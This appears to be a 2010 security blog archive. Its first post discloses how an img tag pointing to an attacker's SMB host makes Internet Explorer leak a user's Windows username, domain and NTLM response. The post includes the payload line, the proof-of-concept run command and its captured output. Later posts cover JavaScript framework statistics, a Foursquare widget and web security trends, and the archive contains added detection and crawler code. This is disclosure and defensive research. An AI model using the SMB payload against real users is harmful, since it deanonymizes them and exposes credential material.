Identifying Internet Explorer User with a SMB Query

Posted on August 11th, 2010 in Security, web | 1 Comment »

As part of our research on browser private mode that I presented this morning at Usenix Security, I took a look at how Internet Explorer handles SMB (Server Message Block) queries. It turns out that because Internet Explorer (IE) processes SMB URLs (Windows file sharing URLs) automatically, it is possible to use the SMB protocol to identify the Internet Explorer user with 100% accuracy.

Internet Explorer uses the same rendering engine as Windows Explorer, called the Trident engine. The good part of this is that you can type a Windows file sharing path such as "\\myserver\mydir\myfile" in your URL bar, and Internet Explorer will seamlessly download it. Similarly, Internet Explorer is also able to browse Windows shared directories in a transparent fashion.

The ugly part of this is that if an attacker includes an img tag in a page that contains an SMB link, such as <img src="\\attackerIP\a.jpg">, Internet Explorer will process it and issue the SMB request without prompting the user. Why is this a bad thing? Well, if you look at the SMB specification you will see that if the server denies the SMB request, the client (here IE) will try to authenticate using an NTLM/NTLMv2 challenge. The bad part for privacy is that during this challenge IE will send your Windows username, domain name, Windows version and a "fingerprint" of your password (NTLM v1 only, details later in this post).

The net result of this behavior is that no matter whether you are using InPrivate mode or an HTTP proxy, the attacker learns your Windows username, domain and password fingerprint from this request. Any privacy measures in IE are therefore useless: unless you change your Windows username, password and domain/group name, a remote attacker will know who you are.

I contacted Microsoft about this; they told me they were aware of the issue and that it was a feature. So today I am releasing the POC (download it here) I wrote to demo this. It is based on Hernan Ochoa's POC for the NTLM weak nonce attack and is written in Ruby. So feel free to test it :)

To launch it, just use the standard Ruby command "ruby ./smb.rb"; that is it. It will bind a fake SMB server on your computer and listen for incoming connections. As soon as it sees one, it will deny it, and at the second request it will give you the victim's username, domain and Windows version. To trigger it you can either directly type "\\ipoftheserver\a.jpg" in your IE URL bar or create a page with an image link that points to your fake server's IP address. The POC could be improved to have its own web server for this, but I felt it was superfluous. If you write it, let me know and I will be happy to update the POC :)

If things work correctly you will see the following output:

linux:~# ruby ./smb.rb
Windows SMB Deanonymizer
(c) 2010 Elie Bursztein web@elie.im
Based on Hernan Ochoa (hernan@gmail.com) poc for smb weak challenge
waiting for connections from victim
1
neg proto request received
neg proto response sent
session setup and request received!
session setup and access denied sent!
session setup andx request with creds received!
ansi 000000000000000000000000000000000000000000000000
NTLM v2 auth
unicode 195ccaab0ede1dcd2f61ec1a82ddb64c01010000000000000
cd7fe447439cb01d4436d39988bfaa900000000020000000000000000000000
user: Elie
domain: Jade
os:

Three technical notes on this attack

  1. You only get a fingerprint of the password when an NTLM v1 challenge is used (2k, XP, Vista), because with NTLMv1 only the server (meaning my code) selects a challenge, which in our case is fixed. In NTLM v2 the client also chooses a challenge, so the fingerprint is not possible anymore and we don't get a fingerprint for Windows 7.
  2. While doing tests over the Internet, I found out that many ISPs block requests on port 445, so in practice if you don't have the right hosting provider you can't make it work over the Internet.
  3. Remember that the fake SMB server runs on port 445, so you need to be root to launch it.

Possible mitigations include: Microsoft restricting SMB queries to the local network, firewalling outbound SMB requests (always a good idea), or using another browser.
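As an added example (not part of the original post or of the POC), here is detection logic in Python for the "firewall outbound SMB requests" mitigation: it scans firewall log lines for TCP connections to port 445 or 139 whose destination lies outside the RFC 1918, loopback and link-local ranges, which is exactly the traffic a fake SMB server on the Internet would receive. The key=value log format, timestamps and addresses are constructed for the example and are not any vendor's real syntax; in a real deployment a denied entry is the firewall doing its job, while an allowed entry is the one worth alerting on.

```python
"""Added example: flag SMB connections that leave the local network.
The log format below is constructed for the example, not a vendor format."""
import ipaddress
import re

SMB_PORTS = {445, 139}  # direct-hosted SMB and the NetBIOS session service

# Address ranges that count as "local"; anything else is treated as the Internet.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]

# Constructed sample firewall log lines (hypothetical key=value format).
SAMPLE_LOG = """\
2010-08-11T09:01:02 action=allow proto=tcp src=192.168.1.20 dst=192.168.1.5 dport=445
2010-08-11T09:01:05 action=allow proto=tcp src=192.168.1.20 dst=203.0.113.7 dport=445
2010-08-11T09:01:09 action=allow proto=tcp src=192.168.1.21 dst=198.51.100.9 dport=80
2010-08-11T09:01:12 action=deny proto=tcp src=192.168.1.22 dst=203.0.113.7 dport=139
2010-08-11T09:01:15 action=allow proto=udp src=192.168.1.23 dst=203.0.113.7 dport=445
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+action=(?P<action>\w+)\s+proto=(?P<proto>\w+)\s+"
    r"src=(?P<src>\S+)\s+dst=(?P<dst>\S+)\s+dport=(?P<dport>\d+)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None when it does not match the format."""
    match = LINE_RE.match(line.strip())
    if not match:
        return None
    record = match.groupdict()
    record["dport"] = int(record["dport"])
    return record


def leaves_local_network(dst):
    """True when the destination address is outside every range in LOCAL_NETS."""
    ip = ipaddress.ip_address(dst)
    return not any(ip in net for net in LOCAL_NETS)


def find_external_smb(log_text):
    """Return (timestamp, src, dst, dport, action) for every TCP SMB connection to a non-local host."""
    hits = []
    for line in log_text.splitlines():
        record = parse_line(line)
        if record is None:
            continue  # malformed or unrelated line
        if record["proto"] != "tcp" or record["dport"] not in SMB_PORTS:
            continue  # SMB rides on TCP 445 (or 139 via NetBIOS)
        if not leaves_local_network(record["dst"]):
            continue  # file sharing inside the LAN is expected
        hits.append((record["ts"], record["src"], record["dst"],
                     record["dport"], record["action"]))
    return hits


def allowed_external_smb(log_text):
    """Only the connections the firewall let through: the ones a remote SMB server actually saw."""
    return [hit for hit in find_external_smb(log_text) if hit[4] == "allow"]


if __name__ == "__main__":
    for hit in find_external_smb(SAMPLE_LOG):
        print("outbound SMB %s: %s -> %s:%d at %s" % (hit[4], hit[1], hit[2], hit[3], hit[0]))
```

The private-range check is written out explicitly rather than relying on `ipaddress.is_private`, because that attribute also reports the documentation ranges used in the sample as private, which would hide the very connections the example is meant to surface.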

45% of the popular websites use a javascript framework

Posted on July 12th, 2010 in web | 4 Comments »

By crawling the Alexa top 100,000 websites I found out that 45% of them use a JavaScript framework, and among those that use a framework 28% of them use jQuery.

I expected that more websites would use a framework, but apparently many people like to do things by hand :) Anyway, the following chart depicts how popular each framework is:

Javascript framework popularity breakdown

As one can see, jQuery is by far the most used framework: 63% of the Alexa top 100,000 websites that use a JavaScript framework choose it. Prototype is the second choice with almost 13%. The third and fourth frameworks, namely YUI and MooTools, are not very far from Prototype: both of them have around 9% market share. Accordingly, if you are trying to decide which framework to learn or use, jQuery is without any doubt the one you will most likely encounter while working on various web apps.

Given that jQuery is so popular, I was curious to know which version is the most used. The result of my data mining on this is summarized in the chart below. These numbers are only an approximation because some websites strip out the version of jQuery they are using.

Besides the obvious fact that version 1.3.2 is by far the most popular with 51.25%, this graph tells us that people do not update their JavaScript framework: version 1.2.6 is still used by 17.4% of the websites. The question is why? Why not update their framework? I think it is a combination of two factors: on one hand developers are afraid of breaking things by updating their framework, and on the other hand they don't see the benefits of updating it. If anyone can come up with a better explanation, or stories/facts that support this hypothesis, I would love to hear it.

Finally, since jQuery comes in two flavors, the regular version and the minified version, I was curious to know how many websites optimize their loading time by using the minified version. The surprising answer to this question is reported in the following chart:

JQuery Regular vs Minified Version Popularity

64% of the websites do not use a minified version of jQuery! I don't know about you, but for me it came as a huge surprise. Why would a website use a non-minified version of jQuery in production?
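The post does not include the crawler, so here is an added Python example (my code, not the author's) of the classification that the framework, version and minified charts above rely on. It pulls every <script src> out of a page with the standard library HTML parser, recognizes jQuery, Prototype, MooTools and YUI by filename patterns (an assumption about common naming conventions, not a rule the post states), extracts the jQuery version including the CDN-style path form such as .../jquery/1.4.2/jquery.min.js, records whether the minified build is used, and then tallies a handful of constructed pages the way the three statistics were computed.

```python
"""Added example: classify pages by JavaScript framework, jQuery version and
minified build. Not the author's crawler; filename patterns are assumptions."""
from collections import Counter
from html.parser import HTMLParser
import re

# Assumed filename conventions for the frameworks named in the post.
FRAMEWORK_PATTERNS = {
    "jquery": re.compile(
        r"(?:^|/)jquery(?:-(?P<ver>\d+(?:\.\d+)+))?(?P<min>\.min)?\.js$", re.I),
    "prototype": re.compile(r"(?:^|/)prototype(?:-[\d.]+)?\.js$", re.I),
    "mootools": re.compile(r"(?:^|/)mootools[-\w.]*\.js$", re.I),
    "yui": re.compile(r"(?:^|/)yui[-\w.]*\.js$|/yui/", re.I),
}
# jQuery served from a CDN carries the version in the path rather than the filename.
CDN_VERSION_RE = re.compile(r"/jquery/(\d+(?:\.\d+)+)/", re.I)


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)


def script_sources(html):
    parser = ScriptSrcCollector()
    parser.feed(html)
    parser.close()
    return parser.srcs


def detect_frameworks(html):
    """Return {framework: {"version": str or None, "minified": bool}} for each framework seen."""
    found = {}
    for src in script_sources(html):
        path = src.split("?", 1)[0]  # drop cache-busting query strings
        for name, pattern in FRAMEWORK_PATTERNS.items():
            match = pattern.search(path)
            if not match or name in found:
                continue
            groups = match.groupdict()
            version = groups.get("ver")
            if name == "jquery" and version is None:
                cdn = CDN_VERSION_RE.search(path)
                version = cdn.group(1) if cdn else None
            found[name] = {"version": version, "minified": bool(groups.get("min"))}
    return found


def tally(pages):
    """Framework share, jQuery version share and minified share over a list of HTML documents."""
    frameworks, versions, builds = Counter(), Counter(), Counter()
    for html in pages:
        found = detect_frameworks(html)
        for name in found:
            frameworks[name] += 1
        if "jquery" in found:
            versions[found["jquery"]["version"] or "unknown"] += 1
            builds["minified" if found["jquery"]["minified"] else "regular"] += 1
    return frameworks, versions, builds


# Constructed sample pages standing in for crawled HTML.
SAMPLE_PAGES = [
    '<html><head><script src="/js/jquery-1.3.2.min.js"></script></head></html>',
    '<html><head><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js">'
    '</script></head></html>',
    '<html><head><script type="text/javascript" src="/static/jquery-1.2.6.js?v=2"></script>'
    '<script src="/static/jquery-ui-1.7.2.min.js"></script></head></html>',
    '<html><head><script src="/lib/prototype.js"></script></head></html>',
    '<html><head><script src="/app.js"></script></head></html>',
]

if __name__ == "__main__":
    for counter in tally(SAMPLE_PAGES):
        print(dict(counter))
```

Note that jQuery UI (jquery-ui-1.7.2.min.js in the third sample page) is deliberately not counted as jQuery core: the pattern requires the version to follow "jquery-" directly, which is one of the ambiguities that make the version numbers in the post an approximation.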

Thanks for reading this post, and if you have some cool ideas for statistics I should extract from the crawl database, let me know :)

How to display your latest foursquare check-in details on your blog

Posted on June 21st, 2010 in web | 9 Comments »

One of the coolest features of Google Latitude is the widget that you can add to your blog or site to display your current location. Since I am already using Foursquare, I wanted to do the same by displaying my latest check-in. It turns out that Foursquare provides an API to retrieve your latest check-in details, but I couldn't find code to create a widget from it. To fill this gap I wrote a small PHP class that fetches check-in data from Foursquare and generates a map for it using the Google Maps API. Using this class you can easily generate a widget that looks like the one below in fewer than 5 lines of code.

foursquare-php example of use

Since I might not be the only one to find this useful, I made the library available from here. Once you have downloaded it, you can create your own widget by adding the following code:

<?php
/*
 * Foursquare latest check-in widget example.
 * Example of a web page that displays a widget using the foursquare.php class to
 * connect to Foursquare, retrieve your last check-in details and the corresponding
 * Google map.
 * Author: Elie Bursztein (fourlocfetcher@elie.im)
 * URL:
 * License: GPL
 */

require_once 'foursquare.php';          // loading the class
$fq = new fourSquare("login", "pass");  // fetching the check-in data

// Escape every value before echoing it into the HTML: the venue name, venue type
// and comment come back from the Foursquare API, not from this page.
function fq_html($value) { return htmlspecialchars($value, ENT_QUOTES, 'UTF-8'); }
?>

<div id="foursquare" style="text-align:center">
    <h2>Last known location:</h2>

    <!-- displaying the Foursquare logo for the venue type -->
    <img src="<?= fq_html($fq->venueIcon) ?>" />

    <!-- displaying the venue name and the venue type -->
    <?= fq_html($fq->venueName) ?> (<?= fq_html($fq->venueType) ?>)<br>

    <!-- displaying the map -->
    <img src="<?= fq_html($fq->getMapUrl(150, 150)) ?>" /><br/>

    <!-- displaying the user comment -->
    "<i><?= fq_html($fq->comment) ?></i>"<br>
</div>

You should now have a fully functional widget :) Note that the function $fq->getMapUrl() accepts many more arguments that let you customize even further how the map looks. The full list of arguments is available on the Google documentation page and in the class directly.

If you think of features that you would like to see added, or if you think I should do a WordPress plugin, then let me know. I will see what I can do :)

web security trends 2010

Posted on June 6th, 2010 in Security | No Comments »

Over the last few months, with Jason and Baptiste, we have gathered a lot of statistics about web security to get a better understanding of how the situation evolves and where doing research will be the most effective. While some of these statistics have already been used in our papers or for our web security class (CS241), many of them are still undisclosed. Since this kind of statistics seems to trigger a lot of interest, based on the feedback I received while giving a talk or a lecture, I thought they would make a great first post for Inftoint reborn. Overall we gathered statistics in three different directions: server security, browser security and web security awareness.

We started with Jason by doing some data mining on the VUPEN vulnerability database to see how much "market share" the web represents. As visible in the figure below, since 2005 the number of vulnerabilities reported for web applications accounts for at least 40% of all the vulnerabilities reported. So it is clear that web security is a big issue and deserves a lot of attention. Moreover, please bear in mind that the vulnerabilities reported affect only browsers and mainstream web applications such as WordPress and Wikimedia, which is only the tip of the iceberg. What is not accounted for in this statistic is the number of vulnerabilities found in custom web applications. It would be nice at some point to cooperate with a vulnerability scanner vendor to do some data mining, as it is not uncommon for a company to have a dozen of those. Similarly, it would be nice to have statistics on vulnerabilities found in top websites, but these statistics are very hard to collect (we are still working on it; if you have any idea how to do it efficiently, shoot me an email).

For those who wonder, the spike observed in 2006 is due to the rise of XSS (cross-site scripting) and SQL injection vulnerabilities. Contrary to popular belief, XSS vulnerabilities had been around for a long time before being popularized after the Internet boom. This is clearly visible in the figure below, which is based on statistics collected by Steve Christey and Robert A. Martin from MITRE in 2007.

What we did next with Jason was to dig deeper into the VUPEN database to get a breakdown of web vulnerabilities by category. This analysis was meant to be used as a baseline to build the testbed used in our paper about PCI scanners' efficiency. As expected, the popularization of XSS and SQL injection vulnerabilities is also visible in the figure below, but our numbers are slightly lower than the MITRE ones. One explanation for this phenomenon is that part of the VUPEN database's value is the uniqueness of each vulnerability; the VUPEN team does a great job of aggregating vulnerability reports. The other factor is the presence in our categorization of XCS (cross-channel scripting), which was not part of the MITRE categorization:

web vulnerability evolution by category 2005 - 2009

I won't discuss this figure too much, as it is already done in this paper. For me the two important points regarding the evolution of web security shown by this figure are that nowadays web security is even more difficult than before: back in 2005, web security was only about testing a few attack vectors, mainly XSS and SQL injection. In 2010, the situation is way more complex, as the number of attack vectors has exploded. For instance, how many of you have heard of the new attack released in May named "Cross Site URL Hijacking"? In a nutshell this attack allows an attacker to learn the URL parameters of a different origin by abusing the Firefox error object. While this attack might seem innocuous, it has serious privacy implications.

The fact that web security is (becoming) a very complex field is supported by another statistic we collected with Baptiste while building our web security testbed, webseclab. We looked at Jeremiah Grossman's blog to compute a trend of how many new web attack vectors are discovered every year. We chose to use Jeremiah's data because he is doing an amazing job of keeping track of what happens in the web security world. As visible in the figure below, which represents the cumulative number of attack vectors discovered over the last four years, the number of vectors to understand/test increases almost linearly:

web attack vector trends 2006 2009

The fact that the number of attack vectors increases at a steady pace poses a serious challenge. Obviously, this steady pace forces the community to continuously build and update tools that help web developers detect whether their web applications are vulnerable to these new attacks, but more deeply it also poses the question of how to educate web developers. I strongly believe that education is the key to web security, because every web application has its own specificities, so unless web developers have a clear understanding of what an attacker can do, the problem will only get worse. As a matter of fact, with this steady stream of new attack vectors, even if you are able to keep track of what is going on (and this is a full-time job), assessing how serious the threat posed by a new attack vector is, and what to do about it, is next to impossible without a strong web security background.

A good example of why having a strong background in web security is important for web developers is clickjacking attacks: I recall that recently I read a blog post (I think it was one of Jeremiah's posts) wondering whether web developers were paying attention to clickjacking attacks. Well, it is obviously not the case, as shown in one of our recent papers, and one reason why web developers don't pay much attention to it is that the consequences of clickjacking attacks are hard to assess without the right background. For instance, how many of you know that you can steal the content of the framed page with a "drag-and-drop clickjacking" attack? Speaking of this, we will demonstrate a lot of new attacks based on framing at Black Hat USA this year.

Another long-lasting example that emphasizes that knowledge is essential to web security is CSRF attacks: even 4 years after the media put this kind of attack under the spotlight, there are still people wondering whether it is really dangerous. If you still don't believe that it is dangerous, ask the people who had their Gmail account backdoored.

To end this post on a bright note, with Baptiste we looked at the number of web trainings proposed at Black Hat. We chose to look at these trainings because it shows the willingness of companies to invest in web security education. It turns out that over the last two years, as visible in the figure below, the number of trainings proposed literally exploded. This supports the hypothesis that web security education is important and people are aware of it.

number of training devoted to web security at the blackhat usa by year